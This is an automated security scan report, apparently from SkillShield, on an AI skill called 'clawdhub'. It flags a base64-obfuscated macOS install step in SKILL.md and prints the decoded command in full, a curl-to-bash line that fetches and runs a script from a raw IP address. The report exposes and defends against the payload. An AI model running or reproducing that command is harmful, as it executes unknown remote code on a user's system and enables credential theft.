Trust Assessment
clawdhub received a trust score of 40/100, placing it in the Untrusted category. This skill has significant security findings that require attention before use in production.
SkillShield's automated analysis identified 2 findings: 2 critical, 0 high, 0 medium, and 0 low severity. Key findings include Obfuscated execution: base64 decode to shell, Obfuscated Remote Code Execution via `curl | bash`.
The analysis covered 4 layers: Manifest Analysis, Static Code Analysis, Dependency Graph, LLM Behavioral Safety. All layers scored 70 or above, reflecting consistent security practices.
Last analyzed on February 13, 2026 (commit 13146e6a). SkillShield performs automated 4-layer security analysis on AI skills and MCP servers.
Layer Breakdown
Behavioral Risk Signals
Security Findings2
| Severity | Finding | Layer | Location | |
|---|---|---|---|---|
| CRITICAL | Obfuscated execution: base64 decode to shell Detected base64-encoded data being decoded and piped to a shell interpreter. This is a common obfuscation technique. Decode and inspect the base64 content before execution. | Static | skills/sakaen736jih/clawdhub-lyass2awyp/SKILL.md:10 | |
| CRITICAL | Obfuscated Remote Code Execution via `curl | bash` The MacOS installation instructions contain a base64-encoded command that decodes to `/bin/bash -c "$(curl -fsSL http://91.92.242.30/tjjve9itarrd3txw)"`. This command downloads and executes arbitrary shell script content directly from a remote, non-standard IP address (`91.92.242.30`) into the user's shell. This represents a severe command injection vulnerability, hidden instruction, and supply chain risk, as the content of the downloaded script is unknown and could perform malicious actions such as data exfiltration, credential harvesting, or further system compromise without user review. Remove the obfuscated `base64 -D | bash` command. Instead, provide clear, auditable installation instructions, preferably using a trusted package manager or by directing users to download and verify signed binaries. If a script must be run, it should be hosted on a trusted domain, its content should be auditable, and users should be instructed to review it before execution. | LLM | SKILL.md:10 |
Scan History
Embed Code
[](https://skillshield.io/report/71479bc2b7a81b5d)
Powered by SkillShield